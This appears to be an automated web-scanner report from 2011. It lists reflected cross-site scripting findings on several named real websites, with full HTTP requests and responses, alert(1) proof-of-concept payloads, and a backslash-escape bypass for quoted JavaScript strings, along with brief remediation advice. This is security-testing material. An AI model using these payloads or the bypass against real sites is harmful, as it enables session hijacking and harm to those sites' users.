GET /media/jsfb164<script>alert(1)</script>8f71f8a479d/jquery.min.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:00 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n23), ms iad-agg-n23 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:30 GMT Age: 0 Content-Length: 260 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/jsfb164<script>alert(1)</script>8f71f8a479d/jquery.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2a41<script>alert(1)</script>752ea324c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediab2a41<script>alert(1)</script>752ea324c3b/js/slideshow.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:11 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n23), ms iad-agg-n23 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:41 GMT Age: 0 Content-Length: 259 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediab2a41<script>alert(1)</script>752ea324c3b/js/slideshow.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d149e<script>alert(1)</script>308c56d3ed6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/jsd149e<script>alert(1)</script>308c56d3ed6/slideshow.js HTTP/1.1 Host: cdn.rollcall.com Proxy-Connection: keep-alive Referer: http://www.rollcall.com/news/-203351-1.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:14:11 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n28), ms iad-agg-n28 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:41 GMT Age: 0 Content-Length: 259 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/jsd149e<script>alert(1)</script>308c56d3ed6/slideshow.js was not found on this server.</p> ...[SNIP]...
The value of the ptnr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb70c\'%3balert(1)//8edcf55a37 was submitted in the ptnr parameter. This input was echoed as bb70c\\';alert(1)//8edcf55a37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /cts4/?ptnr=nasdaqbb70c\'%3balert(1)//8edcf55a37&tm=p_cnd02nas&cat=Fi&type=all&key=&trk= HTTP/1.1 Host: cts.tradepub.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 13 Feb 2011 01:53:24 GMT Server: Apache/1.3.27 (Unix) mod_perl/1.27 Content-Type: text/html Cache-Control: private Content-Length: 2139
The value of the cobrandPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a838\"%3balert(1)//16fba14f96c was submitted in the cobrandPage parameter. This input was echoed as 6a838\\";alert(1)//16fba14f96c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /imps_widget_node.php?aid=32392dee&num_rates=&show_logo=0&medium=js&widget=historical_rate_Table&cobrandPage=http://www.nasdaq.com/aspx/lowinterestcc.stm6a838\"%3balert(1)//16fba14f96c&ext_win=0 HTTP/1.1 Host: imps.creditcards.com Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/investing/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 13 Feb 2011 02:16:48 GMT Server: Apache Content-Type: text/html Content-Length: 13498
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e16a0<script>alert(1)</script>cc6385526d was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.